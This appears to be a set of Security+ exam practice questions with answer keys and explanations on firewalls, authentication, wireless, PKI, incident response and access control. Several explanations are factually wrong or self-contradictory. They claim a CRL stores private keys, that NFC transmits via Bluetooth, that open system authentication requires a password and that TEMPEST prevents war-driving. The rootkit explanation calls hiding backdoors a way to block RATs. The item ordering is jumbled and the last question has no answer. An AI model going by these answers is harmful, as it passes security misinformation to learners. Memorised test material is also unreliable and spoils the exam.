B. A host-based firewall is the best solution to prevent intrusions to a single computer. Firewalls can block various types of traffic that might include attacks or other intrusions. See the section "Implementing Security Applications" in Chapter 3, "Computer Systems Security Part II," for more information. Incorrect answers: A VPN concentrator allows remote access for multiple users. Host-based intrusion detection (via a HIDS) will locate an intrusion but not prevent it; to prevent it you would want a host-based intrusion prevention system (HIPS). A network firewall can help to protect an entire network but will not be the best solution if you were only trying to prevent intrusions to a single computer. The host-based firewall will have definitions that are more specific to the types of attacks that might be perpetuated on a single local computer.

Which of the following methods should you use to fix a single security issue on a computer? Configuration baseline Patch Service pack Patch management

B. A patch or hotfix is designed to fix one security issue on a computer. See the section "Hardening Operating Systems" in Chapter 4, "OS Hardening and Virtualization," for more information. Incorrect answers: A configuration baseline is a set of information about a particular process on a computer; it is what is used to compare future performance analyses. On older Windows systems, service packs fix multiple security issues and update the system in other ways. Patch management is the disbursement and monitoring of patches installed to multiple computers.

You have been asked by an organization to help correct problems with users unknowingly downloading malicious code from websites. Which of the following should you do to fix this problem? Install a network-based intrusion detection system Disable unauthorized ActiveX controls Implement a policy to minimize the problem Use virtual machines

B. ActiveX controls can be built directly into websites and can contain malicious code that can be easily downloaded by users without their knowledge. ActiveX controls can be disabled in whole or in part within the browser and can also be controlled as add-ons. See the section "Securing the Browser" in Chapter 5, "Application Security," for more information. Incorrect answers: A NIDS can possibly defend against malicious ActiveX controls to a certain extent, but you should not solely depend on it. Implementing policies is always a good idea, but you don't want to minimize the problem; you want to fix it. The use of virtual machines works well to isolate problems that might occur from ActiveX controls, but it does not fix the problem as far as downloading the malicious code.

Which device is used to encrypt the authentication process? WPA HSM Enigma machine Smart card

B. An HSM (hardware security module) is a physical device that acts as a secure cryptoprocessor. It is used for the digital signing of data and login/authentication processes. See the section "Securing Computer Hardware and Peripherals" in Chapter 3, "Computer Systems Security Part II," for more information. Incorrect answers: WPA (Wi-Fi Protected Access) is a wireless protocol. An Enigma machine is a machine that was used in World War II for the encryption/decryption of secret messages. Smart cards are used to authenticate individuals, but an HSM offers faster software encryption.

Of the following, which type of device attempts to serve client requests without the user actually contacting the remote server? IP proxy HTTP proxy Firewall DMZ

B. An HTTP proxy caches information from a web server for a set amount of time. This way an organization can save bandwidth, and the users can get their web pages quicker. An HTTP proxy is also known as a caching proxy. See the section "Firewalls and Network Security" in Chapter 8, "Network Perimeter Security," for more information. Incorrect answers: An IP proxy secures a network by keeping the computers behind it anonymous, usually through the use of network address translation (NAT). A firewall protects a network from external attack. A DMZ, or demilitarized zone, is an area between the LAN and the Internet used to store servers that serve information to Internet users.

What are LDAP and Kerberos commonly used for? To sign SSL wildcard certificates To utilize single sign-on capabilities To perform queries on a directory service To store usernames and passwords in a FIM system

B. Both LDAP and Kerberos can be used for single sign-on (SSO). This eases the burden on users of having to remember different usernames and passwords and allows a single login to multiple systems. See the section "Authentication Models and Components" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: A CA is used to sign certificates, including wildcard certificates. Queries on a directory service can be made with LDAP, but not with Kerberos. SSO is a derivative of federated identity management (FIM), but FIM will be its own system altogether separate of LDAP and Kerberos.

Which of the following uses Transport Layer Security and does not work well in enterprise scenarios because certificates must be configured or managed on both the client side and server side? Transitive trust EAP-TLS EAP-TTLS EAP-FAST Kerberos

B. EAP-TLS uses Transport Layer Security, which is a certificate-based system that does enable mutual authentication. This does not work well in enterprise scenarios because certificates must be configured or managed on the client side and server side. See the section "Authentication Models and Components" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: A transitive trust is where two networks (or more) have a relationship such that users logging in to one network get access to data on the other. EAP-TTLS uses Tunneled Transport Layer Security and is basically the same as TLS except that it is done through an encrypted channel, and it requires only server-side certificates. EAP-FAST uses a protected access credential instead of a certificate to achieve mutual authentication. FAST stands for Flexible Authentication via Secure Tunneling. Kerberos is an excellent (and often used) method of authentication for the enterprise. It can work over TLS, but that is not necessary.

Which of the following is a step in deploying a WPA2-Enterprise wireless network? Install a DHCP server on the authentication server Install a digital certificate on the authentication server Install an encryption key on the authentication server Install a token on the authentication server

B. Explanation: If you are running a WPA2-Enterprise wireless network, then the wireless access point (WAP) will need to access a RADIUS server for the authentication portion of the wireless connection. This scenario calls for a digital certificate to be loaded on the RADIUS server.

Your organization has several conference rooms with wired RJ45 jacks that are used by employees and guests. The employees need to access internal organizational resources, but the guests only need to access the Internet. Which of the following should you implement? VPN and IPsec 802.1X and VLANs Switches and a firewall NAT and DMZ

B. In this question the RJ45 wired jacks are the key. You don't want just anyone connecting to the wired jacks and having access to internal resources. So, implementing 802.1X and VLANs is an excellent solution. This will authenticate computers; only systems with the proper 802.1X adapter will be authenticated to internal resources. Other computers that connect will only be able to connect to the Internet. The virtual LAN can be port-based, with a VLAN per conference room, or perhaps protocol-based, defining which computers are allowed to internal resources and which are allowed to the Internet only. See the section "Authentication Models and Components" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: A virtual private network (VPN) is used so that remote users can gain access to the network. The scenario speaks only to localized conference rooms and resources, so a VPN (and the supporting IPsec used in L2TP connections) is not necessary. The organization will most likely have at least one switch and firewall already. However, the switch can be used as the authenticator of the 802.1X system. NAT (network address translation) is used in IPv4 networks to mask internal IP addresses when they access the Internet. This will most likely already be implemented by default, so any guests accessing the Internet will enjoy the security benefits of NAT. However, a demilitarized zone (DMZ) has little to do with the scenario; this is when servers (such as WWW and FTP) are placed in an area outside the LAN but still within the organization's network, making it easier for people on the Internet to access them.

A client contracts you to prevent users from accessing inappropriate websites. Which of the following technologies should you implement? NIDS Internet content filter Honeypot IP proxy

B. Internet content filters prevent users from accessing inappropriate websites. Quite often they are built into caching proxies; however, IP proxies are used to enable the connection of many hosts on a LAN through one IP address out to the Internet. See the section "Firewalls and Network Security" in Chapter 8, "Network Perimeter Security," for more information. Incorrect answers: A NIDS, or network intrusion detection system, can detect attacks on the network and alert a network administrator if they occur. A honeypot is used to attract and trap attackers on the network for further analysis.

Which of the following tools can be used to check network traffic for clear-text passwords? Password cracker Protocol analyzer Port scanner Performance monitor

B. Protocol analyzers can be used to check for clear-text passwords. If a password is sent by a client computer (for example, from Outlook), it will be sent by default as clear text. A protocol analyzer can look inside packets to locate clear-text passwords. See the section "Using Tools to Monitor Systems and Networks" in Chapter 13, "Monitoring and Auditing," for more information. Incorrect answers: Password-cracking programs are used to analyze, recover, or crack passwords. Port scanners are used to find open vulnerabilities in the form of open ports on servers and other network devices. A performance monitor is used to analyze the performance of a server through monitoring the CPU, RAM, hard drive, and so on.

Which the following algorithms is used by the protocol TLS to establish a session key? AES RSA RC4 HTTPS SSL

B. RSA is the asymmetric cryptographic algorithm used by TLS (Transport Layer Security) to establish a session key. See the section "Encryption Algorithms" in Chapter 14, "Encryption and Hashing Concepts," for more information. Incorrect answers: TLS is the successor to SSL (Secure Sockets Layer) that can use RSA or Diffie-Hellman for key exchange as well as AES and RC4 for the encryption of the rest of the session. HTTPS is the web-based secure protocol that makes use of TLS (or SSL), which then makes use of RSA for the key exchange at the start of a session.

You are attempting to apply corporate security settings to a workstation. Which of the following would be the best solution? Hotfix Security template Patch Services.msc

B. Security templates can be applied to computers to configure many rules and policies at once. These security templates will have many rules defining group policies and are common in corporate environments.

In a secure environment, which authentication mechanism performs better? RADIUS because it encrypts client/server passwords TACACS+ because it encrypts client/server negotiation dialogs TACACS+ because it is a remote access authentication service RADIUS because it is a remote access authentication service

B. TACACS+ (Terminal Access Controller Access-Control System Plus) has a few advantages over RADIUS (Remote Authentication Dial-In User Service). It encrypts the initial negotiation between the remote client and the server. It also separates authentication and authorization into two separate functions that introduce another layer of security. Finally, it offers more types of authentication requests than RADIUS. See the section "Authentication Models and Components" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: RADIUS is more common in Windows environments, whereas TACACS+ is used in a variety of environments. So a security administrator should analyze the IT environment carefully before implementing either of these remote authentication systems.

Your Internet café operates a public wireless hotspot. Which of the following should you implement? Disable the SSID Open system authentication MAC filter Reduce the power level

B. The best answer listed is to use open system authentication. In a public hotspot wireless network, this means that anyone can connect as long as they know the password or passphrase. You could also utilize a captive portal, which forces the wireless client to authenticate via a special web page and possibly supply an e-mail address as part of the authentication process. See the section "Securing Wireless Networks" in Chapter 9, "Securing Network Media and Devices," for more information. Incorrect answers: Disabling the SSID would make it difficult for a computer to find the wireless network, and therefore difficult (if not impossible) for patrons to use the Internet. A MAC filter would be very inefficient as the proprietor of the establishment would need to find out the MAC address of each person coming through the door. Reducing the WAP power level is a good way to reduce the chances of war-driving, but isn't necessary in this scenario, though it is a good practice.

You suspect that files are being illegitimately copied to an external location. The file server that the files are stored on does not have logging enabled. Which log should you access to find out more about the files that are being copied illegitimately? DNS log Firewall log Antivirus log System log

B. The firewall log can help you find out whether files are being illegitimately copied to an external location. This is the only log listed that can give you any information about files being copied to an external or remote location. See the section "Conducting Audits" in Chapter 13, "Monitoring and Auditing," for more information. Incorrect answers: The DNS log can help you find out whether unauthorized zone transfers or DNS poisoning has occurred. The antivirus log shows what viruses have been detected and quarantined on a system. The System log is a log file within the Event Viewer that provides information about the operating system and device drivers.

Which of the following types of keys are stored in a CRL? Private keys only TPM keys Public and private keys Public keys only

C. A CRL, or certificate revocation list, stores revoked certificates that contain both public and private keys associated with the certificate. This is common within a PKI, which is asymmetric, using private and public keys. See the section "Public Key Infrastructure" in Chapter 15, "PKI and Encryption Protocols," for more information. Incorrect answers: TPMs, trusted platform modules, use one type of key, usually secret and private.

Virtualization is a broad term that includes the use of virtual machines and the extraction of computer resources. Which of the following is the best security reason for using virtualization of network servers? To centralize patch management To isolate network services and roles To add network services To analyze network traffic

B. Virtualization is the creation of a virtual entity as opposed to an actual server or operating system. The most common type is the virtual machine that runs an entire operating system virtually within the original operating system of the computer. The best security reason for implementing virtualization is to isolate different services and roles. See the section "Virtualization Technology" in Chapter 4, "OS Hardening and Virtualization," for more information. Incorrect answers: Patch management centralization is done to secure all the client operating systems on the network and make sure that they are up to date. Although network services can be added through the use of virtualization, it is the specific concept of isolating those additional network services that makes virtualization secure. The analysis of network traffic can be done with a protocol analyzer, otherwise known as a network sniffer.

Your organization does business with in a TEMPEST-certified building. What attack does this help to prevent? Weak encryption War-driving Bluejacking Bluesnarfing

B. War-driving can be prevented by using TEMPEST-certified techniques. War-driving is when a person attempts to access a company's wireless network from a laptop within their vehicle.

What are kernel-level rootkits designed to do to a computer? (choose 2) Make a computer susceptible to pop-ups Extract confidential information Hide evidence of an attacker's presence Hide backdoors into the computer Crack the user's password

BC. Rootkits in general are designed to gain administrator access while not being detected. Kernel-level rootkits will change code within the operating system and possibly device drivers, enabling the attacker to execute with the same privileges as the operating system. This type of rootkit allows for unrestricted security access. See the section "Delivery of Malware" in Chapter 2, "Computer Systems Security Part I," for more information. Incorrect answers: If a computer displays excessive pop-ups, it could be a sign of a virus or spyware (or just poor browsing habits). Hiding backdoors into a system would be a decent way of blocking remote access Trojans (RATs) and some rootkits. Cracking the user's password is something done by a password-cracking program.

Which of the following should be performed on a computer to protect the OS from malicious software? (Select 2 answers) Install a perimeter firewall Update HIPS signatures Update NIDS signatures Disable unused services Disable DEP settings

BD. An individual operating system should be protected by disabling unused services, and by updating any host-based intrusion detection systems or intrusion prevention systems. See the section "Hardening Operating Systems" in Chapter 4, "OS Hardening and Virtualization," for more information. Incorrect answers: Since we're talking about a single computer, network intrusion detection systems and perimeter firewalls are not required. DEP stands for data execution prevention and does not apply to this scenario.

Your organization must achieve compliance for PCI and SOX. Which of the following would best allow the organization to achieve compliance and ensure security? (Select the three best answers.) Establish a company framework Compartmentalize the network Centralize management of all devices on the network Apply technical controls to meet compliance regulations Establish a list of users that must work with each regulation Establish a list of devices that must meet regulations

BDF. Of the listed options, the best ones for achieving compliance with PCI (Payment Card Industry) and SOX (Sarbanes-Oxley) regulations include the following: 1) Compartmentalize the network - divvy up the network with methods such as VLANs, subnetting, DMZs, whatever security boundary necessary to protect servers and clients that deal with sensitive data. 2) Apply technical controls to meet compliance regulations - for example, vulnerability management, monitoring, protecting data, and so on. 3) Establish a list of devices that must meet regulations: Any devices and computers that will have payment info, health info, or PII of any kind flowing through them should be analyzed, secured, and continually monitored. PCI compliance requirements can be summed up as the following: Protect cardholder data Build and maintain a secure network Maintain an information security policy Maintain a vulnerability management program Implement strong access control measures Regularly monitor and test systems and networks See the section "Legislative and Organizational Policies" in Chapter 18, "Policies and Procedures," for more information. Incorrect answers: Establish a company framework is somewhat vague but could refer to creating an IT security framework. This is a very good idea, but it is more of a high-level plan on how to execute actual procedures and policies, and not the procedures and policies themselves. Centralizing management of all devices might be a good idea from a management perspective, but for security, certain devices will no doubt need to be compartmentalized. Establishing a list of users that work with each regulation is a good idea, but not as important as the technical controls previously mentioned. Note: Remember to familiarize yourself with whatever policies and procedures your organization employs, whether they are related to PCI, SOX, ISO, or other compliance and regulatory methods.

Which of the following types of firewalls provides inspection of data at layer 7 of the OSI model? Network address translation Stateful inspection Application-proxy Circuit-level gateway

C

Your boss has tasked you with ensuring that reclaimed space on a hard drive has been sanitized while the computer is in use. What job should you perform? Individual file encryption Full disk encryption Cluster tip wiping Storage retention

C. A cluster tip is the last portion of a hard drive's cluster that is not used by a file. Often, files take up more than a single cluster. The cluster remainders don't get erased by default, but could possibly contain data remanence. So, some disk cleanup programs contain an option to wipe the cluster tips, thus better sanitizing the drive. This can even be performed while the computer is in use. See the section "Legislative and Organizational Policies" in Chapter 18, "Policies and Procedures," for more information. Incorrect answers: Encryption of any type does not sanitize the drive. Storage retention and data retention usually manifest themselves as policies. For example, an organization might have a storage retention policy that states a hard drive must be kept in storage for a minimum of three years before being fully sanitized and/or destroyed. This is common in high-security environments where data is extremely confidential, or where auditing and other logging information must be kept for a specific amount of time.

The helpdesk department for your organization reports that there are increased calls from clients reporting malware-infected computers. Which of the following steps of incident response is the most appropriate as a first response? Recovery Lessons learned Identification Containment Eradication

C. The first response within the incident response that should be taken in this scenario is identification. The malware needs to be identified, the computers affected need to be identified, and so on. Identification is usually the first step of an organization's incident response process. See the section "Incident Response Procedures" in Chapter 18, "Policies and Procedures," for more information. Incorrect answers: An example of the main phases of incident response (as listed in CompTIA Security+ exam objective 5.4) is as follows: 1. Preparation; 2. Identification; 3. Containment; 4. Eradication; 5. Recovery, and finally; 6. Lessons learned. (This list can vary from one organization to the next and from one standardization body to the next.) A pre-step to this list is preparation - being ready with tools, knowledge, and training before an incident occurs. Validation can occur during steps 5 through 7, depending on the type of validation. Follow-up can be considered part of the documenting and monitoring step.

An administrator configures Unix accounts to authenticate to a non-Unix server on the internal network. The configuration file incorporates the following information: DC=ServerName and DC=COM. Which service is being used? SAML RADIUS LDAP TACACS+

C. DC=ServerName and DC=COM imply the use of a Microsoft Windows domain controller (thus the DC parameter). Lightweight Directory Access Protocol (LDAP) is a directory access and authentication service used by Windows domain controllers, among other technologies. See the section "Authentication Models and Components" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: SAML (Security Assertion Markup Language) is used to address single sign-on (SSO) solutions between two providers; it is based on XML. RADIUS and TACACS+ are other types of authentication servers and are not necessarily Microsoft domain-based. (In fact, TACACS+ is Cisco-based.) Also, they are more often used for remote authentication, whereas the scenario implies a local authentication technology.

Which of the following threats is not associated with Bluetooth? Discovery mode Bluesnarfing Fraggle attack Bluejacking

C. A Fraggle attack is a type of denial-of-service attack that sends a large amount of UDP Echo traffic and is not associated with Bluetooth. See the section "Network Design" in Chapter 6, "Network Design Elements," for more information. Incorrect answers: Discovery mode is a configuration setting that, if enabled, can allow security threats to access the Bluetooth-enabled device; some people consider it a threat unto itself. If Bluetooth devices are set to "discoverable," bluesnarfing and bluejacking attacks could possibly occur. Bluesnarfing is the unauthorized access of information through the Bluetooth connection and is generally the theft of data such as calendar information and phonebook contacts. Bluejacking is the sending of unsolicited messages to Bluetooth-enabled devices. One way to prevent both of these attacks is to set the Bluetooth device to "undiscoverable."

You have been contracted to conduct a forensics analysis on a server. Which of the following should you do first? Analyze temporary files Run an antivirus scan Obtain a binary copy of the system Search for spyware

C. A forensics investigator should first make a copy of the system and store it in a safe place, in case the system fails while the forensics investigation is carried out. See the section "Legislative and Organizational Policies" in Chapter 18, "Policies and Procedures," for more information. Incorrect answers: After making a copy of the system, the forensics analysis might include the analysis of temporary files, and other files as well, running antivirus scans, and possibly searching for spyware. The forensics investigator will have a specific list of rules to go by when investigating what an attacker did.

Which of the following enables an attacker to hide the presence of malicious code by altering Registry entries? Worm Logic bomb Rootkit Trojan

C. A rootkit subverts an operating system by altering system processes and Registry entries. This can enable the attackers to hide the presence of their malicious code.

Which of the following does the discretionary access control model use to identify users who have permissions to a resource? Roles that users have in the organization Predefined access privileges Access control lists Security labels

C. Access control lists (ACLs) are used in the discretionary access control (DAC) model to identify users' permissions to resources. This is common in the Windows client/server networks. By default, the owner assigns permissions to resources. See the section "Access Control Models Defined" in Chapter 11, "Access Control Methods and Models," for more information. Incorrect answers: Role-based access control (RBAC) defines the roles that users have in an organization that are based on sets of predefined permissions. Predefined access privileges can be found in mandatory access control (MAC) and RBAC models. Security labels are used in MAC.

You are in charge of your organization's backup plan. You need to make sure that the data backups are available in case of a disaster. However, you need to keep the plan as inexpensive as possible. Which of the following solutions should you implement? Implement a hot site Implement a cold site Back up data to removable media and store a copy offsite Implement a remote backup solution

C. Backing up data to removable media and storing it offsite is the least expensive solution. See the section "Disaster Recovery Planning and Procedures" in Chapter 16, "Redundancy and Disaster Recovery," for more information. Incorrect answers: Hot sites and cold sites can cost the organization a lot of money, especially hot sites. Implementing a remote backup solution usually requires some sort of service with a monthly fee. You, as the network administrator, can back up data to removable media and store it offsite without incurring any other fees except for the cost of the removable media.

You are the network administrator for your organization and are in charge of many servers, including one web server. Which of the following is the best way to reduce vulnerabilities on your web server? Enable auditing and review log files Block DNS on port 80 Apply updates and patches Use a 24/7 packet sniffer

C. By applying updates and patches to the web server, you decrease the vulnerabilities on that server. You need to keep up to date with all the latest hotfixes and patches for your applications and operating systems. This is generally the best way to reduce vulnerabilities on any system or device. See the section "Hardening Operating Systems" in Chapter 4, "OS Hardening and Virtualization," for more information. Incorrect answers: Enabling auditing and reviewing log files is a smart idea, but it is not proactive. DNS uses port 53, but regardless the web server doesn't actually deal with DNS. A separate DNS server redirects clients to the web server. Packet sniffing is important when checking for vulnerabilities but is not the best way to reduce vulnerabilities; instead, it is a good way to find vulnerabilities. However, 24/7 packet sniffers that run all day can be resource-intensive and are not usually recommended.

You perform a risk assessment for your organization. What should you do during the impact assessment? Determine actions that can be taken to mitigate any potential threat Determine how likely it is that a threat might actually occur Determine the potential monetary costs related to a threat Determine how well the organization is prepared to manage the threat

C. During impact assessment, you want to know what kind of impact a threat can have, and potential monetary costs are a big portion of that impact on an organization. See the section "Conducting Risk Assessments" in Chapter 12, "Vulnerability and Risk Assessment," for more information. Incorrect answers: While determining the potential monetary costs, you do not assess potential threats, or how likely it is that a threat might occur. You do not assess how well the organization is prepared to manage the threat. You are more interested in monetary impact and the impact on servers; for example, loss of data availability and the impact on employees.

Malware can use virtualization techniques. Why would this be difficult to detect? A portion of the malware might have already been removed by an IDS. The malware might be using a Trojan. The malware could be running at a more privileged level than the computer's antivirus software. The malware might be running in the command-line.

C. Explanation: By using privilege escalation, the malware can gain access to the system and possibly run at a higher privilege level than the computer's antivirus software. One of the ways to do this is through the use of virtualization techniques. See the section "Delivery of Malware" in Chapter 2, "Computer Systems Security Part I," for more information. Incorrect answers: If malware is removed, it is no longer a threat. You usually don't see "portions" of malware removed, but regardless this doesn't account for why the rest of the malware is difficult to detect. Trojans are fairly easy to detect if the AV software and/or IDS is up to date. Malware doesn't really run in the command line. It might be initiated from there, but it runs off the hard drive or memory.

What can happen if access mechanisms to data on an encrypted USB hard drive are not implemented correctly? Data on the USB drive can be corrupted. Data on the hard drive can be vulnerable to log analysis. The security controls on the USB drive can be bypassed. User accounts can be locked out.

C. If access mechanisms such as permissions and policies are not implemented correctly on a USB hard drive (or any hard drive for that matter), then those security controls for that drive can be bypassed by an attacker.

Which of the following is a secure wireless authentication method that uses a RADIUS server for the authenticating? CCMP WEP-PSK LEAP WPA2-PSK

C. LEAP (Lightweight Extensible Authentication Protocol) is Cisco's version of EAP. It allows for dynamic Wired Equivalent Privacy (WEP) keys and mutual authentication with a RADIUS server. See the section "Authentication Models and Components" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: The other answers do not use a RADIUS server; they all rely on the pre-shared key (PSK). Counter Mode CBC-MAC Protocol (CCMP) is a secure alternative to Temporal Key Integrity Protocol (TKIP), both of which are used with a protocol such as WPA or WPA2. Both WEP-PSK and WPA2-PSK use pre-shared keys (PSK) that the administrator enters locally at the WAP. However, WEP should not be used in this manner, as it is deprecated. It can, however, be used in conjunction with a RADIUS server. In that scenario, it is possible to use WEP in a secure fashion.

Which of the following is the most effective way of preventing adware? Install an antivirus program Install a host-based intrusion detection system Install a pop-up blocker Install a firewall

C. Pop-up blockers are the most-effective way to prevent adware. Adware consists of the advertisements that pop up on your screen when you go to particular websites. Pop-up blockers are generally installed as add-ons to your web browser and are most often associated with the browser. See the section "Securing the Browser" in Chapter 5, "Application Security," for more information. Incorrect answers: Antivirus programs protect the computer from various types of malware. In some cases they include a pop-up blocker, but not always. The best way to be sure is to install a separate pop-up blocker directly into the web browser. Host-based intrusion detection systems look for patterns in particular types of attacks—that the IDS might not stop pop-ups. A firewall blocks intrusions and closes off any open ports but does not detect pop-ups.

One of your database servers is mission-critical. You cannot afford any downtime. What is the best item to implement to ensure minimal downtime of the server and ensure fault tolerance of the data stored on the database server? UPS RAID Redundant server Spare parts

C. RAID (redundant array of inexpensive [or independent] disks) is a way to make data fault-tolerant. The best example would be to use RAID 5, RAID 6, or RAID 1. RAID 5 and 6 will have minimal downtime if data failure occurs; RAID 1 should have a zero downtime if data failure occurs. See the section "Redundancy Planning" in Chapter 16, "Redundancy and Disaster Recovery," for more information. Incorrect answers: A UPS (uninterruptable power supply) should be installed to protect from power outages but cannot protect from a hard drive error. A redundant server might or might not offer all the data fault tolerance that you want; it depends on how it is configured. Spare parts is a pretty vague answer. While it is important to have spare parts such as drive rails, drive frames, and so on, they probably won't help you in the case of drive failure.

The organization you work for, a video streaming company, hired a security consultant to find out how customer credit card information was stolen. He determined that it was stolen while in transit from gaming consoles. What should you implement to secure this data in the future? Firmware updates WAF TCP Wrapper IDS

C. TCP Wrapper is a host-based ACL program that provides protection against host name and host address spoofing in Linux and Unix environments. Most gaming consoles are Linux-based, and the video streaming servers they connect to are most likely Linux- or Unix-based as well. By using this program, rules can be configured to restrict access to TCP services. For example, attackers can easily determine when an unprotected Linux-based system is idle, and then attempt to access that system when it is unattended. The TCP Wrapper program acts as a pseudo-firewall in that it monitors incoming packets for authorization, thereby blocking the potential attacker. Programs used for streaming can be compiled with TCP Wrapper, and these can also be encrypted to further foil the would-be attacker. (Often this program is also referred to as TCP Wrappers.) By the way, credit card numbers should usually be stored in a transactional database that encrypts down to the database field level, not only the file level. Incorrect answers: Firmware updates are important for any system, but will not stop the problem being described. Some kind of software such as TCP Wrapper (an application layer program) is needed. A web application firewall (WAF) isn't the correct type of firewalling required by video streaming servers and the gaming consoles that connect to them. Plus, WAF along with IDS are solutions that are installed at the server side. This scenario calls for secure coding of the program that transmits data between the gaming consoles and the video streaming servers.

Which of the following attacks involves the interception of authentication traffic on a wireless network? Evil twin Replay attack IV attack Near field communication

C. The IV (initialization vector) attack is when an attacker deciphers the fixed-size input at the beginning of each WEP or WPA packet. WEP is much more susceptible. To avoid the attack, use WPA2. See the section "Securing Wireless Networks" in Chapter 9, "Securing Network Media and Devices," for more information. Incorrect answers: An evil twin is a rogue access point that is controlled by an attacker. It has the same name and configuration as one of the legitimate WAPs in an organization. A replay attack is a network attack in which data packets are repeated or delayed by an outside attacker. Near field communication (NFC) is a technology of mobile devices that allows them to automatically pair and transmit data via Bluetooth.

Which of the following best describes the baseline process of securing a device within a network infrastructure? Active prevention Enumerating Hardening Passive detection

C. The hardening of computers and network devices is part of the baseline process of securing those devices. See the section "Securing Wired Networks and Devices" in Chapter 9, "Securing Network Media and Devices," for more information. Incorrect answers: Active prevention can refer to network intrusion prevention systems that have not yet been hardened. Enumerating is the listing of possible security threats. Passive detection can refer to network intrusion detection systems that have not yet been hardened.

You are the security administrator working for a large corporation with many remote workers. You are tasked with deploying a remote access solution for both staff and contractors. Company management favors Remote Desktop Services because of its ease of use. Your current risk assessment suggests that you protect Windows as much as possible from direct ingress traffic exposure. Which of the following solutions should you choose? A. Change remote desktop to a non-standard port, and implement password complexity for the entire Active Directory domain. B. Distribute new IPsec VPN client software to applicable parties, and then virtualize the remote desktop services functionality. C. Place the remote desktop server(s) on a screened subnet, and implement two-factor authentication. D. Deploy a remote desktop server on your internal LAN, and require an Active Directory integrated SSL connection for access.

C. The key phrase here is that the risk assessment suggests that Windows should be protected from ingress traffic. That mainly implies the Windows clients, but could include the Windows server as well. Either way, to that end, one of the best ways to secure the server is to compartmentalize the remote desktop server on a screened subnet. Remember that contractors will be using this server too, so you don't want it to be anywhere near other important servers in your network, and possibly it should be isolated from any and all servers. The two-factor authentication is the icing on the cake, and is an excellent solution for remote workers where theft/loss of laptops can occur. All in all, it's the best of the listed answers. See the sections "Network Design" in Chapter 6, "Network Design Elements," and "Authentication Models and Components" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: "Change remote desktop to a non-standard port, and implement password complexity for the entire active directory domain." - Changing the remote desktop port is commonly implemented. For example, Microsoft remote desktop services uses 3389 inbound by default. Any attacker with a little experience knows this. So, changing the port is a good idea, but from the answer you can assume that the server is not in a screened subnet, DMZ, or similar protected area. Implementing password complexity for the Active Directory domain implies that the remote desktop server is located in the domain. You probably don't want that, or at least need to compartmentalize it in some way. Also, password complexity should already have been enabled, especially if this is an enterprise-level corporate network. "Distribute new IPsec VPN client software to applicable parties, and then virtualize the remote desktop services functionality." - It's kind of a given: you would have to distribute some kind of VPN client software in order for remote users to connect. However, IPsec implies an L2TP connection. There are better, more secure options such as a Cisco GRE tunnel, or an always-on SSL/TLS-based VPN. But that doesn't tackle the problem of server location. Also, "virtualize the remote desktop services functionality" is vague. Are we talking about the clients? Server? Both? Most likely clients, and virtualizing apps can have security benefits, but remote desktop client apps aren't commonly virtualized. And if this is a large enterprise network (implying lots of remote users), then a virtualized remote access server is probably not a good idea from a performance standpoint. "Deploy a remote desktop server on your internal LAN, and require an active directory integrated SSL connection for access." - We definitely don't want the remote access server on the LAN. No, it should be located somewhere more secure such as a DMZ, subnet, on the cloud, etc. Active Directory with SSL (meaning LDAP over SSL, port 636) is a good idea, but it again implies that the remote desktop server is on the LAN. Using a subnet or DMZ and using multifactor authentication dismisses most of the security issues associated with this incorrect answer's solution. Remember to carefully secure your remote desktop servers using a layered defense strategy, especially if that server requires communication with a domain controller or other server on the LAN.

Which of the following techniques supports availability when considering a vendor-specific vulnerability in critical industrial control systems? Verifying that antivirus definitions are up to date Deploying multiple firewalls at the network perimeter Incorporating diversity into redundant design Enforcing application whitelists

C. The key word in the question is availability. One of the best ways to encourage availability is to have redundancy. The more diverse the redundancy, the more fault tolerant the system. See the section "Redundancy Planning" in Chapter 16, "Redundancy and Disaster Recovery," and "Facilities Security" in Chapter 17, "Social Engineering, User Education, and Facilities Security," for more information. Incorrect answers: Some industrial control systems do not have the option to run AV software, but even if they did, AV software does not promote availability directly. It helps to secure from viruses and other malware, but it is not a method of fault tolerance. Multiple firewalls, for example a back-to-back perimeter configuration, will help to block network-based attacks, but also do not increase availability. Application whitelists, if not configured properly, could actually reduce availability. They are meant to restrict users to specific allowed applications.

You have found vulnerabilities in your SCADA system. Unfortunately, changes to the SCADA system cannot be made without vendor approval, which can take months to obtain. Which of the following is the best way to protect the SCADA system in the interim? Install a firewall in the SCADA network Update AV definitions on the SCADA system Deploy a NIPS at the edge of the SCADA network Enable auditing of accounts on the SCADA system

C. The only answer that does not require modifications to the actual SCADA (supervisory control and data acquisition) system and network is to deploy a NIPS (network intrusion prevention system) at the edge of the SCADA network. This will monitor for (and protect against) attacks on the SCADA system, but does not require that the SCADA system be modified. See the section "Facilities Security" in Chapter 17, "Social Engineering, User Education, and Facilities Security," for more information. Incorrect answers: Installing a firewall, updating AV definitions, and enabling auditing all require modifications to the SCADA system and network. While you wait for testing to be completed and obtain vendor approval, these avenues should be explored, but not implemented.

Which of the following can be implemented in hardware or software to protect a web server from XSS attacks? Flood guard IDS URL content filter WAF

D. A WAF (web application firewall) can be implemented as hardware or software. Among other things it can protect from XSS (cross-site scripting) and SQL injection attacks. The WAF can be an appliance, server software, or plug-in, and applies a set of rules to HTTP sessions to protect from various attacks. WebKnight and ModSecurity are examples of open source WAFs. Unlike other devices such as network intrusion detection systems (NIDSs), routers, and some firewalls, the WAF operates at layer 7 of the OSI model (application layer).

Which of the following characterizations best suits the term Java applets? Java applets include a digital signature. Java applets allow for customized controls and icons. Java applets need to have virtual machine web browser support. Java applets are the same as ActiveX controls.

C. Web browsers must have the capability to run Java applets in a virtual machine environment. If the virtual machine browser does not have the capability to do this, the Java applets cannot function. Virtual machines isolate an operating system or a web browser to secure them. However, they need to function properly; therefore, the virtual web browser must support Java applets. See the section "Securing the Browser" in Chapter 5, "Application Security," for more information. Incorrect answers: Java applets can be used for various things, but not all will include a digital signature, nor will all of them be used for customized controls and icons. The answers concerning digital signatures and customized controls are absolute, whereas Java applets will have many functions. Java applets are not the same as Microsoft's ActiveX controls.

Alice has read and write access to a database. Bob, her subordinate, only has read access. Alice needs to leave to go to a conference. Which access control type should you implement to trigger write access for Bob when Alice is not onsite? Discretionary access control Mandatory access control Rule-based access control Role-based access control Attribute-based access control

